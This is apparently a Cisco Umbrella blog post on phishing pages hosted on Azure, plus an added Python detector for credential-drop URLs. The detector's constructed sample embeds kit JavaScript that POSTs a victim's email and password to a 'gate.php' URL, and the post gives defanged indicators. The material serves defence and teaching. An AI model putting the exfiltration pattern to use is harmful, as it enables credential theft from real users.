Why cloud providers are top targets for phishing attacks

By Sneha Shekar
September 15, 2020


84.7% of cyberattacks involve phishing. Given that, it is important to understand the various forms a phishing attack can take. Phishing URLs are commonly hosted on cloud providers. This article explains why cloud providers are increasingly used for phishing campaigns and what pattern an attack hosted on these services usually follows.

Phishing pages hosted on cloud services like Microsoft Azure can trick users into believing that they are visiting a legitimate site.

First, the browser shows a padlock for these pages. Users who do not look closely may take the padlock to mean the site is safe. The padlock only indicates that the connection is encrypted and that the certificate is valid for the hostname in the address bar; it says nothing about whether the site itself is trustworthy.

Even a user who knows this difference and inspects further will find a valid TLS certificate issued by Microsoft. This is because the page is hosted on Microsoft Azure, and Microsoft provisions the certificate for every hostname under azurewebsites.net, the attacker's included.

Moreover, the URL often contains windows[.]net or azurewebsites[.]net, which may lead users to believe that it is a legitimate Microsoft site. Only the parent domain belongs to Microsoft; the subdomain in front of it is whatever name the attacker chose when creating the app.

Every week we identify many phishing sites that behave this way.

Let's take a look at one of them:

When a user browses to hXXps://enq42yzh.azurewebsites.net/caiTxU/, the page shows a Microsoft login form.

Example of fake login page - Cisco Umbrella blog

A WHOIS lookup shows the domain, azurewebsites.net, registered to Microsoft. WHOIS has no record of who created the enq42yzh subdomain, so the lookup tells the user nothing about the actual operator of the page.

Example of fake WHOIS domain registration - Cisco Umbrella blog

The TLS certificate of the site is issued by Microsoft, which again leads the user to think the site is a legitimate one.

Example of fake SSL Certificate - Cisco Umbrella blog

However, when a user enters login credentials on this page, the attacker receives the login ID and password, and the phishing attempt succeeds.

To see how this happens, we inspect the source code of the page. In this particular case, after the user enters credentials and clicks the 'Login' button, the page simply returns the user to the login page; by then the credentials have already been sent to the attacker.

This can be seen in the source code of the page:

Example of malicious source code - Cisco Umbrella blog

In other cases, the source code contains heavily obfuscated text. In the example below, the snippet contains a string that is likely base64 encoded.

Example of obfuscated text - Cisco Umbrella blog

Here, we took one such encoded part and decoded it. The decoded JavaScript code is shown below:

Example of decoded JavaScript code - Cisco Umbrella blog

Analyzing the code, we see a variable named gate that holds a URL: hXXps://voicecenterserved[.]azurewebsites.net/assets/gate.php.

A POST request is made to this URL carrying the email and password the user entered. This destination is where the attacker collects the credentials; it functions as the kit's collection (C&C) server. Sometimes the link to this server is encoded as a hex string, and sometimes it appears in plain text in the page source.

Example of variable gate URL as a hex string - Cisco Umbrella blog
Example of phishing source code - Cisco Umbrella blog
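As an added example (not code from the original post or from Cisco Umbrella), the following Python script performs the two checks this post walks through by hand: it flags URLs whose parent domain belongs to a shared hosting platform such as azurewebsites.net, where WHOIS and the TLS certificate describe the cloud provider rather than the tenant, and it scans page source, including base64- and hex-encoded strings, for a credential drop URL such as the gate variable above. The platform suffix list, the sample page, and the drop URLs embedded in it are constructed for this example.

```python
import base64
import binascii
import re
from urllib.parse import urlparse

# Suffixes of multi-tenant hosting platforms (constructed list; extend it for
# your environment). WHOIS for these zones names the cloud provider, and the
# provider issues the TLS certificate for every tenant hostname, so neither
# says anything about who operates a particular subdomain.
SHARED_PLATFORM_SUFFIXES = (
    ".azurewebsites.net",
    ".blob.core.windows.net",
    ".web.core.windows.net",
)

URL_RE = re.compile(r"https?://[A-Za-z0-9.\-_]+(?:/[^\s'\"<>]*)?")
# Long runs of base64 alphabet, optionally padded.
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
# JavaScript-style \xNN escapes, or a bare run of hex pairs.
HEX_RE = re.compile(r"(?:\\x[0-9a-fA-F]{2}){8,}|\b(?:[0-9a-fA-F]{2}){16,}\b")


def refang(url):
    """Turn a defanged indicator (hXXps, [.]) back into a parseable URL."""
    return url.replace("[.]", ".").replace("hXXp", "http").replace("hxxp", "http")


def hosted_on_shared_platform(url):
    """True when the hostname sits under a shared platform zone, meaning the
    registrar and certificate issuer reflect the provider, not the tenant."""
    host = (urlparse(refang(url)).hostname or "").lower()
    return any(host.endswith(suffix) for suffix in SHARED_PLATFORM_SUFFIXES)


def decode_candidates(text):
    """Decode base64- and hex-looking blobs in page source into strings."""
    decoded = []
    for match in B64_RE.finditer(text):
        try:
            decoded.append(base64.b64decode(match.group(0), validate=True).decode("utf-8"))
        except (binascii.Error, ValueError, UnicodeDecodeError):
            continue  # not real base64, or not text once decoded
    for match in HEX_RE.finditer(text):
        try:
            decoded.append(bytes.fromhex(match.group(0).replace("\\x", "")).decode("utf-8"))
        except (ValueError, UnicodeDecodeError):
            continue
    return decoded


def find_exfil_urls(page_source):
    """Return URLs in the page, plain or hidden in encoded strings, that look
    like a credential drop ('gate' naming or a .php endpoint)."""
    found = set()
    for layer in [page_source] + decode_candidates(page_source):
        for match in URL_RE.finditer(layer):
            url = match.group(0)
            if "gate" in url.lower() or url.lower().endswith(".php"):
                found.add(url)
    return sorted(found)


# Constructed sample page modelled on the pattern described in the post:
# one drop URL hidden behind base64 + eval, one behind \x hex escapes.
_KIT_JS = (
    'var gate = "https://tenant-example.azurewebsites.net/assets/gate.php";\n'
    'fetch(gate, {method: "POST", body: new URLSearchParams({email: e, pass: p})});'
)
_HEX_URL = "".join("\\x%02x" % b for b in b"https://drop-example.azurewebsites.net/post.php")
SAMPLE_PAGE = (
    '<html><body><form id="login"></form>\n'
    '<script>eval(atob("' + base64.b64encode(_KIT_JS.encode()).decode() + '"));</script>\n'
    '<script>var g = "' + _HEX_URL + '";</script>\n'
    "</body></html>"
)

if __name__ == "__main__":
    page_url = "hXXps://enq42yzh.azurewebsites.net/caiTxU/"  # from the post
    print("shared platform:", hosted_on_shared_platform(page_url))
    for drop in find_exfil_urls(SAMPLE_PAGE):
        print("credential drop:", drop, "| shared platform:", hosted_on_shared_platform(drop))
```

The second check is deliberately shallow (one decoding layer, two obfuscation styles) so that it runs on a saved page without executing any of the kit's JavaScript; a kit that nests encodings or builds the gate URL at run time will need the same logic applied to the output of a sandboxed run.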

The credentials obtained may then be used in a number of ways: to access the victim's other accounts, to sell to third parties, to fuel a further campaign, and so on.

Phishing attacks of this type have been on the rise over the last few years. Phishing targeting SaaS and other webmail services continues to be the largest category of phishing (per APWG's Q1 2020 report). By obtaining a user's Microsoft or similar SaaS credentials, the attacker gains access to every account linked to that user ID, which exposes the user to a very wide range of follow-on threats.

Conclusion

Cisco Umbrella resolves over 220 billion DNS requests daily, giving our researchers a unique view of the Internet to better identify trends on threats, faster. We are constantly finding new ways to uncover “fingerprints” that attackers leave behind and ways to build new statistical and machine learning models to automatically identify attacker infrastructure to pre-emptively neutralize it. This way, attacks can be stopped even before the specific nature of the attack is fully identified.

Interested in trying out Umbrella? Sign up for a free 14-day trial today.
